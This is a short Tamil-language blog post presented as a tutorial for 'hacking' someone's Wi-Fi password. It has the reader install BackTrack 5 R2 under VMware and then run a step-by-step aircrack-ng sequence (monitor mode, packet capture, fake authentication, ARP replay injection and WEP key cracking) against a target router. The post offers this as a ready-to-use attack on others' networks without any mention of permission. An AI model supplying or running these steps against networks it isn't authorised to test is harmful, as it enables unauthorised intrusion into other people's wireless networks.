இன்றைக்கு ஒரு அற்புதமான இடுகை ஒன்றை இடுகிறேன். தலைப்பை பார்த்தவுடன் புரிந்து கொண்டிருப்பீர்கள். yes ஒரு wifi Password ஐ எவ்வாறு Hack செய்வது என்று பார்ப்போம்.
இதற்கு நமக்கு 2 மென்பொருட்கள் தேவை.
1.Back Track5 R2
2.VM Ware Work Station.
இரண்டு மென்பொருளின் Link ஐ யும் கீழே தந்துள்ளேன். பதிவிறக்கி கொள்ளவும்.
ok இப்போது தொடங்குவோம்.
VM Ware Work Station ஐ உங்கள் கணணியில் நிறுவி, அதனுல் Back Track ஐ நிறுவவும். இப்போது Back Trackல் Konsole Terminal திறந்து
- airmon-ng
- airmon-ng start wlan0
- airodump-ng mon0
- airodump-ng -c (your channel number) --bssid -w wep mon0
- aireplay-ng -1 0 -a (your bssid number) mon0
- aireplay-ng -3 -b (your bssid number) mon0
- aircrack-ng wep-01.cap
(இதில் வரும் அனைத்து Your ம் நீங்கள் Hack செய்யப்போகும் Router உடையது.)
இதன் காணொளியைக்கான Hacker Video Tutorial ஐ click செய்யவும்.
பனிவான வேண்டுகோள். இந்த பக்கத்திலுள்ள Download Link ஐ click செய்தால். ஒரு விளம்பரம் தோன்றும், அதில் வலது பக்க மேல் மூலையில் SKIP AD என்பதை click செய்யவும் என்பதை மிகவும் தாழ்மையுடன் வேண்டிக்கொள்கின்றேன்
No comments:
Post a Comment